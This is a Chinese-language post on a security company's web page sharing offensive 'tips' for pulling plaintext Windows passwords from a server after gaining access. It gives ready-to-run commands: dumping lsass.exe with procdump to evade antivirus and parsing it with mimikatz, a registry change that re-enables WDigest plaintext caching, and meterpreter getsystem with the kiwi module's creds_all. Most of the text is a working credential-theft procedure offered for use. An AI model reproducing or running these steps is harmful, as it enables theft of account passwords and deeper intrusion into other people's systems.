获取Windows明文密码的小技巧_集群智慧网络安全云
全国客户服务热线:4006-054-001 疑难解答:159-9855-7370(7X24受理投诉、建议、合作、售前咨询),173-0411-9111(售前),155-4267-2990(售前),座机/传真:0411-83767788(售后),微信咨询:543646
企业服务导航

获取Windows明文密码的小技巧

发布日期:2024-05-24 浏览次数: 专利申请、商标注册、软件著作权、资质办理快速响应热线:4006-054-001 微信:15998557370


获取Windows明文密码的小技巧

在实战中,拿到一台Windows服务器权限,如果可以直接获取Windows明文密码的话,就可以更容易深入挖掘。本文分享几个获取Windows明文密码的技巧,简单直接且有效。 01、Procdump+Mimikatz 利用procdump+Mimikatz 绕过杀软获取Windows明文密码。 (1)工具准备: ProcDump: https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump mimikatz: https://github.com/gentilkiwi/mimikatz/ 2)Windows Server 2008 R2提取明文密码  在目标机器上生成存储文件:  procdump64.exe -accepteula -ma lsass.exe lsass.dmp    将lsass.dmp复制到本地,使用mimikatz 一行命令将结果输出到文本。 mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"> pssword.txt 如图:成功从内存中提取明文密码。    02、Window 2012 R2抓取密码  在Windows2012系统及以上的系统,默认在内存缓存中禁止保存明文密码的。攻击者可以通过修改注册表的方式抓取明文,需要用户重新登录后才能成功抓取。  (1)修改注册表 reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f (2)用户administrator注销后重新登录,成功抓取到明文信息。 mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt 03、MSF kiwi模块  使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。  提到system有两个方法,一是当前的权限是administrator用户,二是利用其它手段先提权到administrator用户。然后administrator用户可以直接getsystem到system权限。   meterpreter > getuidServer username: BYPASS-E97BA3FC\Administratormeterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).meterpreter > getuidServer username: NT AUTHORITY\SYSTEM 加载kiwi模块: load kiwi 列举系统中的明文密码: creds_all

获取Windows明文密码的小技巧